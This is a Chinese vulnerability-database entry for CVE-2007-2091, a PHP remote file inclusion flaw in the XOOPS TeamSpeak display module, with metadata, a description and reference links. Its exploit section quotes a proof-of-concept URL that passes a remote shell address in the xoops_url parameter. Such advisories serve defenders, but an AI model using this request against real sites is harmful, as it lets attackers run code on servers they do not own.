XOOPS TeamSpeak播放模块 'TSDisplay4xoops_block2.PHP' 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112723 漏洞类型 代码注入
发布时间 2007-04-16 更新时间 2009-02-03
CVE编号 CVE-2007-2091 CNNVD-ID CNNVD-200704-333
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3750
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-333
|漏洞详情
tsdisplay4xoops(TSD4XOOPS,又称TeamSpeak播放模块)的blocks/tsdisplay4xoops_block2.php中存在PHP远程文件包含漏洞。远程攻击者可以借助xoops_url参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
# tsdisplay4xoops 0.1(xoops_url)Remote File Include Vulnerabilitiy
# D.Script: http://kisskool30.free.fr/tsdisplay4xoopsv0.08.zip 
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://Www.Tryag.Com/cc
# Exploit:[Path]/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=Shell
# Greetz To: Tryag.Com/cc & Dwrat.Com & Asb-May.Net/bb

# milw0rm.com [2007-04-16]
|参考资料

来源:XF
名称:xoops-tsdisplay4xoopsblock2-file-include(33695)
链接:http://xforce.iss.net/xforce/xfdb/33695
来源:BID
名称:23518
链接:http://www.securityfocus.com/bid/23518
来源:MILW0RM
名称:3750
链接:http://www.milw0rm.com/exploits/3750
来源:VUPEN
名称:ADV-2007-1424
链接:http://www.frsirt.com/english/advisories/2007/1424
来源:OSVDB
名称:37413
链接:http://osvdb.org/37413